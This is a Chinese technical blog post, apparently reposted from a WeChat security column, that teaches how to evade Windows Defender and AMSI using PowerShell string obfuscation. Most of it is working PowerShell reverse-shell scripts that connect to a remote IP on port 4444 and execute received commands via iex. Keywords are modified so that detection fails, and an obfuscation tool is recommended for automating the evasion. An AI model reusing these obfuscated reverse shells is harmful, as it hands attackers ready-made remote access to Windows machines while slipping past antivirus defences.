前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Bypass Windows Defender Reverse Shell

Bypass Windows Defender Reverse Shell

作者头像
鸿鹄实验室
发布2021-04-15 10:30:24
1.1K0
发布2021-04-15 10:30:24
举报
文章被收录于专栏:鸿鹄实验室鸿鹄实验室

引言

本文将从powershell特性说起,一步步介绍powershell特性,并使用特性绕过Windows Defender Reverse Shell,并在最后给出自动化工具。

0x01 powershell特性:

首先我们先来了解关于powershell的一些特性,他将有效的帮助我们来绕过各类AV\EDR等,来执行我们的恶意代码,在win10中引入了amsi机制,可以有效的预防powershell执行恶意代码,比如下面这样:

代码语言:javascript
复制
Write-Host "amsicontext"

下面将介绍几个powershell特性,以帮助我们来进行bypass操作。

1、字符串拼接

代码语言:javascript
复制
PS C:\Users\Administrator> $context = "amsi" + "context" 
PS C:\Users\Administrator> Write-Host $context

2、ASCII码转换

代码语言:javascript
复制
PS C:\Users\Administrator> Write-Host([char]97+[char]109+[char]115+[char]105+[char]101+[char]111+[char]110+[char]116+[char]101+[char]120+[char]116)

3、变量拼接

代码语言:javascript
复制
PS C:\Users\Administrator> $var = "context" 
PS C:\Users\Administrator> Write-Host "amsi+$var"amsi+context
PSC:\Users\Administrator> Write-Host "amsi$var"

4、字符串格式化

代码语言:javascript
复制
PS C:\Users\Administrator> $string = "amsi{0}{1}" -f "con","text" 
PS C:\Users\Administrator> Write-Host $string

5、字符串替换

代码语言:javascript
复制
PS C:\Users\Administrator> $replace = "amsiABCDEF" -replace"ABCDEF","context" 
PS C:\Users\Administrator> Write-Host $replace

0x02 实战bypass

我们以反弹shell代码为例,实战bypass,代码如下:

代码语言:javascript
复制
$sm=(New-Object 
Net.Sockets.TCPClient('192.168.254.1',55555)).GetStream();
[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;
$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);
$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));
$sm.Write($st,0,$st.Length)}

测试这类代码的精髓就是依次删除,找到拦截的关键字。经测试,代码变为下面这样时,不再拦截。

但此时无法执行命令。仔细观察代码,我们可以尝试更改其中的敏感词,比如变为下面这样:

代码语言:javascript
复制
$sm=(New-Object Net.Sockets.TCPClient('192.168.2.114',4444)).GetStream();
[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;
$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);
$var = "ASCII";
$st=([text.encoding]::$var).GetBytes((iex $d 2>&1));
$sm.Write($st,0,$st.Length)}

成功bypass,再比如下面这个代码:

代码语言:javascript
复制
#$client = New-Object System.Net.Sockets.TCPClient('192.168.254.1',4444);
$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};
$client.Close()
代码语言:javascript
复制
$client = New-Object System.Net.Sockets.TCPClient('192.168.2.114',4444);
$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data 2>&1 | Out-String );
$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';
$var = "utf8";
$sendbyte = ([text.encoding]::$var).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);
$stream.Flush()};
$client.Close()

bypass

自动化

https://github.com/danielbohannon/Invoke-Obfuscation

END

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2020-09-06,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 鸿鹄实验室 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档